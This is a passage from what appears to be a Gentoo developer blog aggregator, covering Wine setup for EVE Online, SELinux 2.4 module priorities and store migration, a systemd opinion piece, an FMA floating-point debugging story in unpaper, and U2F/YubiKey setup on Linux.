media-libs/mesa abi_x86_32
media-libs/openal abi_x86_32
media-sound/mpg123 abi_x86_32
net-dns/avahi abi_x86_32
net-libs/gnutls abi_x86_32
net-print/cups abi_x86_32
sys-apps/dbus abi_x86_32
sys-devel/llvm abi_x86_32
sys-fs/udev gudev abi_x86_32
sys-libs/gdbm abi_x86_32
sys-libs/ncurses abi_x86_32
sys-libs/zlib abi_x86_32
virtual/glu abi_x86_32
virtual/jpeg abi_x86_32
virtual/libffi abi_x86_32
virtual/libiconv abi_x86_32
virtual/libudev abi_x86_32
virtual/opengl abi_x86_32
virtual/pkgconfig abi_x86_32
x11-libs/libX11 abi_x86_32
x11-libs/libXau abi_x86_32
x11-libs/libXcursor abi_x86_32
x11-libs/libXdamage abi_x86_32
x11-libs/libXdmcp abi_x86_32
x11-libs/libXext abi_x86_32
x11-libs/libXfixes abi_x86_32
x11-libs/libXi abi_x86_32
x11-libs/libXinerama abi_x86_32
x11-libs/libXrandr abi_x86_32
x11-libs/libXrender abi_x86_32
x11-libs/libXxf86vm abi_x86_32
x11-libs/libdrm abi_x86_32
x11-libs/libvdpau abi_x86_32
x11-libs/libxcb abi_x86_32
x11-libs/libxshmfence abi_x86_32
x11-proto/damageproto abi_x86_32
x11-proto/dri2proto abi_x86_32
x11-proto/dri3proto abi_x86_32
x11-proto/fixesproto abi_x86_32
x11-proto/glproto abi_x86_32
x11-proto/inputproto abi_x86_32
x11-proto/kbproto abi_x86_32
x11-proto/presentproto abi_x86_32
x11-proto/randrproto abi_x86_32
x11-proto/renderproto abi_x86_32
x11-proto/xcb-proto abi_x86_32 python_targets_python3_4
x11-proto/xextproto abi_x86_32
x11-proto/xf86bigfontproto abi_x86_32
x11-proto/xf86driproto abi_x86_32
x11-proto/xf86vidmodeproto abi_x86_32
x11-proto/xineramaproto abi_x86_32
x11-proto/xproto abi_x86_32

Now emerge both Wine — the latest and greatest of course — and the questionable library so textures will be rendered:

emerge -av media-libs/libtxc_dxtn =app-emulation/wine-1.7.29

You may get some messages along the lines of:

emerge: there are no ebuilds to satisfy ">=sys-libs/zlib-1.2.8-r1".

This was a bit of a head scratcher for me. I have syslibs/zlib-1.2.8-r1 installed. I didn’t have to accept its keyword. It’s already stable! I haven’t really looked into why, but you have to accept its keyword to press forward:

# echo '=sys-libs/zlib-1.2.8-r1' >> /etc/portage/package.accept_keywords

You’ll have to do the above several times for other packages when you try to emerge Wine. Most of the time the particular version it wants is something you already have installed. Check what you do have installed with eix or other favorite tool so you don’t downgrade anything. Once wine is installed, as your user run:

$ winecfg

Download the EVE Online Windows installer and run it using Wine:

$ wine EVE_Online_Installer_*.exe

Once that’s done, invoke the launcher as:

$ force_s3tc_enable=true wine 'C:\Program Files (x86)\CCP\EVE\eve.exe'

force_s3tc_enable=true is needed to enable texture rendering. Without it, EVE will freeze during start up. (If you didn’t emerge media-libs/libtxc_dxtn, EVE will start, but none of the textures will load, and you’ll have a lot of black on black objects.) I didn’t have to do any of the other things I’ve found, such as disabling DirectX 11.

As for my Linux setup: I have a Radeon HD6480G (SUMO/r600) in my ThinkPad Edge E525, and I’m using the open source radeon (www.x.org) drivers with graphics on high and medium anti-aliasing with Mesa and OpenGL. For the most part, I find the game play to be smooth and indistinguishable from my experience on Windows.

There are a few things that don’t work well. Psychedelic, rendering artifacts galore when I open the in-game browser (IGB) or switch to another application, but that’s resolve without logging out of EVE by changing the graphics quality to something else. It may be related to resource caching, but I need to do more testing. I haven’t tried going into the Captain’s Quarters (other users have reported crashes entering there) as back on Windows that brings my system to a crawl, and there isn’t anything particularly interesting about going in there…yet.

Overall, I’m quite happy with the EVE/Wine experience on Gentoo. It was quite easy and there wasn’t any real troubleshooting for me to do.

If you’re a fellow Gentoo-er in EVE, drop me a line. If you want to give EVE a go, have an extra week on me.

Update: I’ve been informed by Aatos Taavi that running EVE in windowed mode works quite well. I’ve also been informed that we need to declare stable packages in portage.accept_keywords because abi_x86_32 is use masked.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Using multiple priorities with modules (October 31, 2014, 16:24 UTC)

One of the new features of the 2.4 SELinux userspace is support for module priorities. The idea is that distributions and administrators can override a (pre)loaded SELinux policy module with another module without removing the previous module. This lower-version module will remain in the store, but will not be active until the higher-priority module is disabled or removed again.

The “old” modules (pre-2.4) are loaded with priority 100. When policy modules with the 2.4 SELinux userspace series are loaded, they get loaded with priority 400. As a result, the following message occurs:

~# semodule -i screen.pp
libsemanage.semanage_direct_install_info: Overriding screen module at lower priority 100 with module at priority 400

So unlike the previous situation, where the older module is substituted with the new one, we now have two “screen” modules loaded; the last one gets priority 400 and is active. To see all installed modules and priorities, use the --list-modules option:

~# semodule --list-modules=all | grep screen
100 screen     pp
400 screen     pp

Older versions of modules can be removed by specifying the priority:

~# semodule -X 100 -r screen

October 30, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have been trying my best not to comment on systemd one way or another for a while. For the most part because I don't want to have a trollfest on my blog, because moderating it is something I hate and I'm sure would be needed. On the other hand it seems like people start to bring me in the conversation now from time to time.

What I would like to point out at this point is that both extreme sides of the vision are, in my opinion, behaving childishly and being totally unprofessional. Whether it is name-calling of the people or the software, death threats, insults, satirical websites, labeling of 300 people for a handful of them, etc.

I don't think I have been as happy to have a job that allows me not to care about open source as much as I did before as in the past few weeks as things keep escalating and escalating. You guys are the worst. And again I refer to both supporters and detractors, devs of systemd, devs of eudev, Debian devs and Gentoo devs, and so on so forth.

And the reason why I say this is because you both want to bring this to extremes that I think are totally uncalled for. I don't see the world in black and white and I think I said that before. Gray is nuanced and interesting, and needs skills to navigate, so I understand it's easier to just take a stand and never revise your opinion, but the easy way is not what I care about.

Myself, I decided to migrate my non-server systems to systemd a few months ago. It works fine. I've considered migrating my servers, and I decided for the moment to wait. The reason is technical for the most part: I don't think I trust the stability promises for the moment and I don't reboot servers that often anyway.

There are good things to the systemd design. And I'm sure that very few people will really miss sysvinit as is. Most people, especially in Gentoo, have not been using sysvinit properly, but rather through OpenRC, which shares more spirit with systemd than sysv, either by coincidence or because they are just the right approach to things (declarativeness to begin with).

At the same time, I don't like Lennart's approach on this to begin with, and I don't think it's uncalled for to criticize the product based on the person in this case, as the two are tightly coupled. I don't like moderating people away from a discussion, because it just ends up making the discussion even more confrontational on the next forum you stumble across them — this is why I never blacklisted Ciaran and friends from my blog even after a group of them started pasting my face on pictures of nazi soldiers from WW2. Yes I agree that Gentoo has a good chunk of toxic supporters, I wish we got rid of them a long while ago.

At the same time, if somebody were to try to categorize me the same way as the people who decided to fork udev without even thinking of what they were doing, I would want to point out that I was reproaching them from day one for their absolutely insane (and inane) starting announcement and first few commits. And I have not been using it ever, since for the moment they seem to have made good on the promise of not making it impossible to run udev without systemd.

I don't agree with the complete direction right now, and especially with the one-size-fit-all approach (on either side!) that tries to reduce the "software biodiversity". At the same time there are a few designs that would be difficult for me to attack given that they were ideas of mine as well, at some point. Such as the runtime binary approach to hardware IDs (that Greg disagreed with at the time and then was implemented by systemd/udev), or the usage of tmpfs ACLs to allow users at the console to access devices — which was essentially my original proposal to get rid of pam_console (that played with owners instead, making it messy when having more than one user at console), when consolekit and its groups-fiddling was introduced (groups can be used for setgid, not a good idea).

So why am I posting this? Mostly to tell everybody out there that if you plan on using me for either side point to be brought home, you can forget about it. I'll probably get pissed off enough to try to prove the exact opposite, and then back again.

Neither of you is perfectly right. You both make mistake. And you both are unprofessional. Try to grow up.

Edit: I mistyped eudev in the original article and it read euscan. Sorry Corentin, was thinking one thing and typing another.

Sven Vermeulen a.k.a. swift (homepage, bugs)

In a few moments, SELinux users which have the ~arch KEYWORDS set (either globally or for the SELinux utilities in particular) will notice that the SELinux userspace will upgrade to version 2.4 (release candidate 5 for now). This upgrade comes with a manual step that needs to be performed after upgrade. The information is mentioned as post-installation message of the policycoreutils package, and basically sais that you need to execute:

~# /usr/libexec/selinux/semanage_migrate_store

The reason is that the SELinux utilities expect the SELinux policy module store (and the semanage related files) to be in /var/lib/selinux and no longer in /etc/selinux. Note that this does not mean that the SELinux policy itself is moved outside of that location, nor is the basic configuration file (/etc/selinux/config). It is what tools such as semanage manage that is moved outside that location.

I tried to automate the migration as part of the packages themselves, but this would require the portage_t domain to be able to move, rebuild and load policies, which it can’t (and to be honest, shouldn’t). Instead of augmenting the policy or making updates to the migration script as delivered by the upstream project, we currently decided to have the migration done manually. It is a one-time migration anyway.

If for some reason end users forget to do the migration, then that does not mean that the system breaks or becomes unusable. SELinux still works, SELinux aware applications still work; the only thing that will fail are updates on the SELinux configuration through tools like semanage or setsebool – the latter when you want to persist boolean changes.

~# semanage fcontext -l
ValueError: SELinux policy is not managed or store cannot be accessed.
~# setsebool -P allow_ptrace on
Cannot set persistent booleans without managed policy.

If you get those errors or warnings, all that is left to do is to do the migration. Note in the following that there is a warning about ‘else’ blocks that are no longer supported: that’s okay, as far as I know (and it was mentioned on the upstream mailinglist as well as not something to worry about) it does not have any impact.

~# /usr/libexec/selinux/semanage_migrate_store
Migrating from /etc/selinux/mcs/modules/active to /var/lib/selinux/mcs/active
Attempting to rebuild policy from /var/lib/selinux
sysnetwork: Warning: 'else' blocks in optional statements are unsupported in CIL. Dropping from output.

You can also add in -c so that the old policy module store is cleaned up. You can also rerun the command multiple times:

~# /usr/libexec/selinux/semanage_migrate_store -c
warning: Policy type mcs has already been migrated, but modules still exist in the old store. Skipping store.
Attempting to rebuild policy from /var/lib/selinux

You can manually clean up the old policy module store like so:

~# rm -rf /etc/selinux/mcs/modules

So… don’t worry – the change is small and does not break stuff. And for those wondering about CIL I’ll talk about it in one of my next posts.

October 29, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Happy 17th! (October 29, 2014, 15:10 UTC)

Just wanted to wish you a Happy 17th Birthday, Noah. I hope that it is a great day for you, and that the upcoming year is even better than this past one! My wish for you this year is that you are able to take time to enjoy the truly important things in life: family, friends, your health, and the events that don’t require anything more than your attention. Take the time—MAKE the time—to stop and appreciate the world around you.

–Zach

October 27, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Yesterday I have released a new version of unpaper which is now in Portage, even though is dependencies are not exactly straightforward after making it use libav. But when I packaged it, I realized that the tests were failing — but I have been sure to run the tests all the time while making changes to make sure not to break the algorithms which (as you may remember) I have not designed or written — I don't really have enough math to figure out what's going on with them. I was able to simplify a few things but I needed Luca's help for the most part.

Turned out that the problem only happened when building with -O2 -march=native so I decided to restrict tests and look into it in the morning again. Indeed, on Excelsior, using -march=native would cause it to fail, but on my laptop (where I have been running the test after every single commit), it would not fail. Why? Furthermore, Luca was also reporting test failures on his laptop with OSX and clang, but I had not tested there to begin with.

A quick inspection of one of the failing tests' outputs with vbindiff showed that the diffs would be quite minimal, one bit off at some non-obvious interval. It smelled like a very minimal change. After complaining on G+, Måns pushed me to the right direction: some instruction set that differs between the two.

My laptop uses the core-avx-i arch, while the server uses bdver1. They have different levels of SSE4 support – AMD having their own SSE4a implementation – and different extensions. I should probably have paid more attention here and noticed how the Bulldozer has FMA4 instructions, but I did not, it'll show important later.

I decided to start disabling extensions in alphabetical order, mostly expecting the problem to be in AMD's implementation of some instructions pending some microcode update. When I disabled AVX, the problem went away — AVX has essentially a new encoding of instructions, so enabling AVX causes all the instructions otherwise present in SSE to be re-encoded, and is a dependency for FMA4 instructions to be usable.

The problem was reducing the code enough to be able to figure out if the problem was a bug in the code, in the compiler, in the CPU or just in the assumptions. Given that unpaper is over five thousands lines of code and comments, I needed to reduce it a lot. Luckily, there are ways around it.

The first step is to look in which part of the code the problem appears. Luckily unpaper is designed with a bunch of functions that run one after the other. I started disabling filters and masks and I was able to limit the problem to the deskewing code — which is when most of the problems happened before.

But even the deskewing code is a lot — and it depends on at least some part of the general processing to be run, including loading the file and converting it to an AVFrame structure. I decided to try to reduce the code to a standalone unit calling into the full deskewing code. But when I copied over and looked at how much code was involved, between the skew detection and the actual rotation, it was still a lot. I decided to start looking with gdb to figure out which of the two halves was misbehaving.

The interface between the two halves is well-defined: the first return the detected skew, and the latter takes the rotation to apply (the negative value to what the first returned) and the image to apply it to. It's easy. A quick look through gdb on the call to rotate() in both a working and failing setup told me that the returned value from the first half matched perfectly, this is great because it meant that the surface to inspect was heavily reduced.

Since I did not want to have to test all the code to load the file from disk and decode it into a RAW representation, I looked into the gdb manual and found the dump commands that allows you to dump part of the process's memory into a file. I dumped the AVFrame::data content, and decided to use that as an input. At first I decided to just compile it into the binary (you only need to use xxd -i to generate C code that declares the whole binary file as a byte array) but it turns out that GCC is not designed to compile efficiently a 17MB binary blob passed in as a byte array. I then opted in for just opening the raw binary file and fread() it into the AVFrame object.

My original plan involved using creduce to find the minimal set of code needed to trigger the problem, but it was tricky, especially when trying to match a complete file output to the md5. I decided to proceed with the reduction manually, starting from all the conditional for pixel formats that were not exercised… and then I realized that I could split again the code in two operations. Indeed while the main interface is only rotate(), there were two logical parts of the code in use, one translating the coordinates before-and-after the rotation, and the interpolation code that would read the old pixels and write the new ones. This latter part also depended on all the code to set the pixel in place starting from its components.

By writing as output the calls to the interpolation function, I was able to restrict the issue to the coordinate translation code, rather than the interpolation one, which made it much better: the reduced test case went down to a handful of lines:

void rotate(const float radians, AVFrame *source, AVFrame *target) {
    const int w = source->width;
    const int h = source->height;

    // create 2D rotation matrix
    const float sinval = sinf(radians);
    const float cosval = cosf(radians);
    const float midX = w / 2.0f;
    const float midY = h / 2.0f;

    for (int y = 0; y < h; y++) {
        for (int x = 0; x < w; x++) {
            const float srcX = midX + (x - midX) * cosval + (y - midY) * sinval;
            const float srcY = midY + (y - midY) * cosval - (x - midX) * sinval;
            externalCall(srcX, srcY);
        }
    }
}

Here externalCall being a simple function to extrapolate the values, the only thing it does is printing them on the standard error stream. In this version there is still reference to the input and output AVFrame objects, but as you can notice there is no usage of them, which means that now the testcase is self-contained and does not require any input or output file.

Much better but still too much code to go through. The inner loop over x was simple to remove, just hardwire it to zero and the compiler still was able to reproduce the problem, but if I hardwired y to zero, then the compiler would trigger constant propagation and just pre-calculate the right value, whether or not AVX was in use.

At this point I was able to execute creduce; I only needed to check for the first line of the output to match the "incorrect" version, and no input was requested (the radians value was fixed). Unfortunately it turns out that using creduce with loops is not a great idea, because it is well possible for it to reduce away the y++ statement or the y < h comparison for exit, and then you're in trouble. Indeed it got stuck multiple times in infinite loops on my code.

But it did help a little bit to simplify the calculation. And with again a lot of help by Måns on making sure that the sinf()/cosf() functions would not return different values – they don't, also they are actually collapsed by the compiler to a single call to sincosf(), so you don't have to write ugly code to leverage it! – I brought down the code to

extern void externCall(float);
extern float sinrotation();
extern float cosrotation();

static const float midX = 850.5f;
static const float midY = 1753.5f;

void main() {
    const float srcX = midX * cosrotation() - midY * sinrotation();
    externCall(srcX);
}

No external libraries, not even libm. The external functions are in a separate source file, and beside providing fixed values for sine and cosine, the externCall() function only calls printf() with the provided value. Oh if you're curious, the radians parameter became 0.6f, because 0, 1 and 0.5 would not trigger the behaviour, but 0.6 which is the truncated version of the actual parameter coming from the test file, would.

Checking the generated assembly code for the function then pointed out the problem, at least to Måns who actually knows Intel assembly. Here follows a diff of the code above, built with -march=bdver1 and with -march=bdver1 -mno-fma4 — because turns out the instruction causing the problem is not an AVX one but an FMA4, more on that after the diff.

        movq    -8(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmovss  -20(%rbp), %xmm2
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovss  -20(%rbp), %xmm1
+       vfmsubss        %xmm0, .LC0(%rip), %xmm1, %xmm0
        leave
        .cfi_remember_state
        .cfi_def_cfa 7, 8
-       vsubss  %xmm0, %xmm1, %xmm0
        jmp     externCall@PLT
 .L6:
        .cfi_restore_state

It's interesting that it's changing the order of the instructions as well, as well as the constants — for this diff I have manually swapped .LC0 and .LC1 on one side of the diff, as they would just end up with different names due to instruction ordering.

As you can see, the FMA4 version has one instruction less: vfmsubss replaces both one of the vmulss and the one vsubss instruction. vfmsubss is a FMA4 instruction that performs a Fused Multiply and Subtract operation — midX * cosrotation() - midY * sinrotation() indeed has a multiply and subtract!

Originally, since I was disabling the whole AVX instruction set, all the vmulss instructions would end up replaced by mulss which is the SSE version of the same instruction. But when I realized that the missing correspondence was vfmsubss and I googled for it, it was obvious that FMA4 was the culprit, not the whole AVX.

Great, but how does that explain the failure on Luca's laptop? He's not so crazy so use an AMD laptop — nobody would be! Well, turns out that Intel also have their Fused Multiply-Add instruction set, just only with three operands rather than four, starting from Haswell CPUs, which include… Luca's laptop. A quick check on my NUC which also has a Haswell CPU confirms that the problem exists also for the core-avx2 architecture, even though the code diff is slightly less obvious:

        movq    -24(%rbp), %rax
        xorq    %fs:40, %rax
        jne     .L6
-       vmulss  .LC1(%rip), %xmm0, %xmm0
-       vmovd   %ebx, %xmm2
-       vmulss  .LC0(%rip), %xmm2, %xmm1
+       vmulss  .LC1(%rip), %xmm0, %xmm0
+       vmovd   %ebx, %xmm1
+       vfmsub132ss     .LC0(%rip), %xmm0, %xmm1
        addq    $24, %rsp
+       vmovaps %xmm1, %xmm0
        popq    %rbx
-       vsubss  %xmm0, %xmm1, %xmm0
        popq    %rbp
        .cfi_remember_state
        .cfi_def_cfa 7, 8

Once again I swapped .LC0 and .LC1 afterwards for consistency.

The main difference here is that the instruction for fused multiply-subtract is vfmsub132ss and a vmovaps is involved as well. If I read the documentation correctly this is because it stores the result in %xmm1 but needs to move it to %xmm0 to pass it to the external function. I'm not enough of an expert to tell whether gcc is doing extra work here.

So why is this instruction causing problems? Well, Måns knew and pointed out that the result is now more precise, thus I should not work it around. Wikipedia, as linked before, points also out why this happens:

A fused multiply–add is a floating-point multiply–add operation performed in one step, with a single rounding. That is, where an unfused multiply–add would compute the product b×c, round it to N significant bits, add the result to a, and round back to N significant bits, a fused multiply–add would compute the entire sum a+b×c to its full precision before rounding the final result down to N significant bits.

Unfortunately this does mean that we can't have bitexactness of images for CPUs that implement fused operations. Which means my current test harness is not good, as it compares the MD5 of the output with the golden output from the original test. My probable next move is to use cmp to count how many bytes differ from the "golden" output (the version without optimisations in use), and if the number is low, like less than 1‰, accept it as valid. It's probably not ideal and could lead to further variation in output, but it might be a good start.

Optimally, as I said a long time ago I would like to use a tool like pdiff to tell whether there is actual changes in the pixels, and identify things like 1-pixel translation to any direction, which would be harmless… but until I can figure something out, it'll be an imperfect testsuite anyway.

A huge thanks to Måns for the immense help, without him I wouldn't have figured it out so quickly.

Why is U2F better than OTP? (October 27, 2014, 11:22 UTC)

It is not really obvious to many people how U2F is better than OTP for two-factor authentication; in particular I've seen it compared with full-blown smartcard-based authentication, and I think that's a bad comparison to do.

Indeed, since the Security Key is not protected by a PIN, and the NEO-n is designed to be semi-permanently attached to a laptop or desktop. At first this seems pretty insecure, as secure as storing the authorization straight into the computer, but it's not the case.

But let's start from the target users: the Security Key is not designed to replace the pure-paranoia security devices such as 16Kibit-per-key smartcards, but rather the on-phone or by-sms OTPs two-factor authenticators, those that use the Google Authenticator or other opensource implementations or that are configured to receive SMS.

Why replacing those? At first sight they all sound like perfectly good idea, what's to be gained to replace them? Well, there are plenty of things, the first of being the user friendliness of this concept. I know it's an overuse metaphor, but I do actually consider features on whether my mother would be able to use them or not — she's not a stupid person and can use a computer mostly just fine, but adding any on more procedures is something that would frustrate her quite a bit.

So either having to open an application and figure out which of many codes to use at one time, or having to receive an SMS and then re-type the code would be not something she'd be happy with. Even more so because she does not have a smartphone, and she does not keep her phone on all the time, as she does not want to be bothered by people. Which makes both the Authenticator and SMS ways not a good choice — and let's not try to suggests that there are way to not be available on the phone without turning it off, it would be more to learn that she does not care about.

Similar to the "phone-is-not-connected" problem, but for me rather than my mother, is the "wrong-country-for-the-phone" problem: I travel a lot, this year aiming for over a hundred days on the road, and there are very few countries in which I keep my Irish phone number available – namely Italy and the UK, where Three is available and I don't pay roaming, when the roaming system works… last time I've been to London the roaming system was not working – in the others, including the US which is obviously my main destination, I have a local SIM card so I can use data and calls. This means that if my 2FA setup sends an SMS on the Irish number, I won't receive it easily.

Admittedly, an alternative way to do this would be for me to buy a cheap featurephone, so that instead of losing access to that SIM, I can at least receive calls/SMS.

This is not only a theoretical. I have been at two conferences already (USENIX LISA 13, and Percona MySQL Conference 2014) and realized I cut myself out of my LinkedIn account: the connection comes from a completely different country than usual (US rather than Ireland) and it requires reauthentication… but it was configured to send the SMS to my Irish phone, which I had no access to. Given that at conferences is when you meet people you may want to look up on LinkedIn, it's quite inconvenient — luckily the authentication on the phone persists.

The authenticator apps are definitely more reliable than that when you travel, but they also come with their set of problems. Beside the not complete coverage of services (LinkedIn noted above for instance does not support authenticator apps), which is going to be a problem for U2F as well, at least at the beginning, neither Google's or Fedora's authenticator app allow you to take a backup of the private keys used for OTP authentication, which means that when you change your phone you'll have to replace, one by one, the OTP generation parameters. For some services such as Gandi, there is also no way to have a backup code, so if you happen to lose, break, or reset your phone without disabling the second factor auth, you're now in trouble.

Then there are a few more technical problems; HOTP, similarly to other OTP implementations, relies on shared state between the generator and the validator: a counter of how many times the code was generated. The client will increase it with every generation, the server should only increase it after a successful authentication. Even discounting bugs on the server side, a malicious actor whose intent is to lock you out can just make sure to generate enough codes on your device that the server will not look ahead enough to find the valid code.

TOTP instead relies on synchronization of time between server and generator which is a much safer assumption. Unfortunately, this also means you have a limited amount of time to type your code, which is tricky for many people who're not used to type quickly — Luca, for instance.

There is one more problem with both implementations: they rely on the user to choose the right entry and in the list and copy the right OTP value. This means you can still phish an user to type in an OTP and use it to authenticate against the service: 2FA is a protection against third parties gaining access to your account by having your password posted online rather than a protection against phishing.

U2F helps for this, as it lets the browser to handshake with the service before providing the current token to authenticate the access. Sure there might still be gaps on is implementation and since I have not studied it in depth I'm not going to vouch for it to be untouchable, but I trust the people who worked on it and I feel safer with it than I would be with a simple OTP.

October 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have already posted a howto on how to set up the YubiKey NEO and YubiKey NEO-n for U2F, and I promised I would write a bit more on the adventure to get the software packaged in Gentoo.

You have to realize at first that my relationship with Yubico has not always being straightforward. I have at least once decided against working on the Yubico set of libraries in Gentoo because I could not get a hold of a device as I wanted to use it. But luckily now I was able to place an order with them (for some two thousands euro) and I have my devices.

But Yubico's code is usually quite well written, and designed to be packaged much more easily than most other device-specific middleware, so I cannot complain too much. Indeed, they split and release separately different libraries with different goals, so that you don't need to wait for enough magnitude to be pulled for them to make a new release. They also actively maintain their code in GitHub, and then push proper make dist releases on their website. They are in many ways a packager's dream company.

But let's get back to the devices themselves. The NEO and NEO-n come with three different interfaces: OTP (old-style YubiKey, just much longer keys), CCID (Smartcard interface) and U2F. By default the devices are configured as OTP only, which I find a bit strange to be honest. It is also the case that at the moment you cannot enable both U2F and OTP modes, I assume because there is a conflict on how the "touch" interaction behaves, indeed there is a touch-based interaction on the CCID mode that gets entirely disabled once enabling either of U2F or OTP, but the two can't share.

What is not obvious from the website is that to enable U2F (or CCID) modes, you need to use yubikey-neo-manager, an open-source app that can reconfigure the basics of the Yubico device. So I had to package the app for Gentoo of course, together with its dependencies, which turned out to be two libraries (okay actually three, but the third one sys-auth/ykpers was already packaged in Gentoo — and actually originally committed by me with Brant proxy-maintaining it, the world is small, sometimes). It was not too bad but there were a few things that might be worth noting down.

First of all, I had to deal with dev-libs/hidapi that allows programmatic access to raw HID USB devices: the ebuild failed for me, both because it was not depending on udev, and because it was unable to find the libusb headers — turned out to be caused by bashisms in the configure.ac file, which became obvious as I moved to dash. I have now fixed the ebuild and sent a pull request upstream.

This was the only real hard part at first, since the rest of the ebuilds, for app-crypt/libykneomgr and app-crypt/yubikey-neo-manager were mostly straightforward ­— only I had to figure out how to install a Python package as I never did so before. It's actually fun how distutils will error out with a violation of install paths if easy_install tries to bring in a non-installed package such as nose, way before the Portage sandbox triggers.

The problems started when trying to use the programs, doubly so because I don't keep a copy of the Gentoo tree on the laptop, so I wrote the ebuilds on the headless server and then tried to run them on the actual hardware. First of all, you need to have access to the devices to be able to set them up; the libu2f-host package will install udev rules to allow the plugdev group access to the hidraw devices ­— but it also needed a pull request to fix them. I also added an alternative version of the rules for systemd users that does not rely on the group but rather uses the ACL support (I was surprised, I essentially suggested the same approach to replace pam_console years ago!)

Unfortunately that only works once the device is already set in U2F mode, which does not work when you're setting up the NEO for the first time, so I originally set it up using kdesu. I have since decided that the better way is to use the udev rules I posted in my howto post.

After this, I switched off OTP, and enabled U2F and CCID interfaces on the device — and I couldn't make it stick, the manager would keep telling me that the CCID interface was disabled, even though the USB descriptor properly called it "Yubikey NEO U2F+CCID". It took me a while to figure out that the problem was in the app-crypt/ccid driver, and indeed the change log for the latest version points out support for specifically the U2F+CCID device.

I have updated the ebuilds afterwards, not only to depend on the right version of the CCID driver – the README for libykneomgr does tell you to install pcsc-lite but not about the CCID driver you need – but also to check for the HIDRAW kernel driver, as otherwise you won't be able to either configure or use the U2F device for non-Google domains.

Now there is one more part of the story that needs to be told, but in a different post: getting GnuPG to work with the OpenPGP applet on the NEO-n. It was not as straightforward as it could have been and it did lead to disappointment. I'll be a good post for next week.

October 25, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

When the Google Online Security blog announced earlier this week the general availability of Security Key, everybody at the office was thrilled, as we've been waiting for the day for a while. I've been using this for a while already, and my hope is for it to be easy enough for my mother and my sister, as well as my friends, to start using it.

While the promise is for a hassle-free second factor authenticator, it turns out it might not be as simple as originally intended, at least on Linux, at least right now.

Let's start with the hardware, as there are four different options of hardware that you can choose from:

  • Yubico FIDO U2F which is a simple option only supporting the U2F protocol, no configuration needed;
  • Plug-up FIDO U2F which is a cheaper alternative for the same features — I have not witnessed whether it is as sturdy as the Yubico one, so I can't vouch for it;
  • Yubikey NEO which provides multiple interface, including OTP (not usable together with U2F), OpenPGP and NFC;
  • Yubikey NEO-n the same as above, without NFC, and in a very tiny form factor designed to be left semi-permanently in a computer or laptop.

I got the NEO, but mostly to be used with LastPass ­– the NFC support allows you to have 2FA on the phone without having to type it back from a computer – and a NEO-n to leave installed on one of my computers. I already had a NEO from work to use as well. The NEO requires configuration, so I'll get back at it in a moment.

The U2F devices are accessible via hidraw, a driverless access protocol for USB devices, originally intended for devices such as keyboards and mice but also leveraged by UPSes. What happen though is that you need access to the device, that the Linux kernel will make by default accessible only by root, for good reasons.

To make the device accessible to you, the user actually at the keyboard of the computer, you have to use udev rules, and those are, as always, not straightforward. My personal hacky choice is to make all the Yubico devices accessible — the main reason being that I don't know all of the compatible USB Product IDs, as some of them are not really available to buy but come from instance from developer mode devices that I may or may not end up using.

If you're using systemd with device ACLs (in Gentoo, that would be sys-apps/systemd with acl USE flag enabled), you can do it with a file as follows:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", TAG+="uaccess"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", TAG+="uaccess"

If you're not using systemd or ACLs, you can use the plugdev group and instead do it this way:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", GROUP="plugdev", MODE="0660"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", GROUP="plugdev", MODE="0660"

-These rules do not include support for the Plug-up because I have no idea what their VID/PID pairs are, I asked Janne who got one so I can amend this later.- Edit: added the rules for the Plug-up device. Cute their use of f1d0 as device id.

Also note that there are properly less hacky solutions to get the ownership of the devices right, but I'll leave it to the systemd devs to figure out how to include in the default ruleset.

These rules will not only allow your user to access /dev/hidraw0 but also to the /dev/bus/usb/* devices. This is intentional: Chrome (and Chromium, the open-source version works as well) use the U2F devices in two different modes: one is through a built-in extension that works with Google assets, and it accesses the low-level device as /dev/bus/usb/*, the other is through a Chrome extension which uses /dev/hidraw* and is meant to be used by all websites. The latter is the actually standardized specification and how you're supposed to use it right now. I don't know if the former workflow is going to be deprecated at some point, but I wouldn't be surprised.

For those like me who bought the NEO devices, you'll have to enable the U2F mode — while Yubico provides the linked step-by-step guide, it was not really completely correct for me on Gentoo, but it should be less complicated now: I packaged the app-crypt/yubikey-neo-manager app, which already brings in all the necessary software, including the latest version of app-crypt/ccid required to use the CCID interface on U2F-enabled NEOs. And if you already created the udev rules file as I noted above, it'll work without you using root privileges. Just remember that if you are interested in the OpenPGP support you'll need the pcscd service (it should auto-start with both OpenRC and systemd anyway).

I'll recount separately the issues with packaging the software. In the mean time make sure you keep your accounts safe, and let's all hope that more sites will start protecting your accounts with U2F — I'll also write a separate opinion piece on why U2F is important and why it is better than OTP, this is just meant as documentation, howto set up the U2F devices on your Linux systems.

Gentoo Monthly Newsletter: September 2014 (October 25, 2014, 09:10 UTC)

Gentoo News

Council News

The september council meeting was quite uneventful. The only outcome of note was that the dohtml function for ebuilds will be deprecated now and banned in a later EAPI, with some internal consequences for, e.g., einstalldocs.

Releases

New LiveDVD - Iron Penguin Edition thanks to the Gentoo Infrastructure team and Fernando Reyes. If you haven’t yet checked it out, what are you waiting for? Go get it on your closest mirror.

Gentoo Miniconf 2014

(shameless copy of Tomas Chvatal’s report on the gentoo-project mailing list)

Hello guys,

First I would like to say big thank you to Amy (amynka) for prodding and nudging people and working on the booth. Next in line is Christopher (chithead) whom also handled our booth and even brought with him fancy MIPS machine and monitor all the way from Berlin. Kudos for that. And last I want to commend all the people giving the talks during the day. In the end we did bit Q&A with users, which was short so rest I spent asking how we should do the miniconf and what would be desired. So first lets take look on what we had and what we can do there to make it even cooler for next time:

Booth

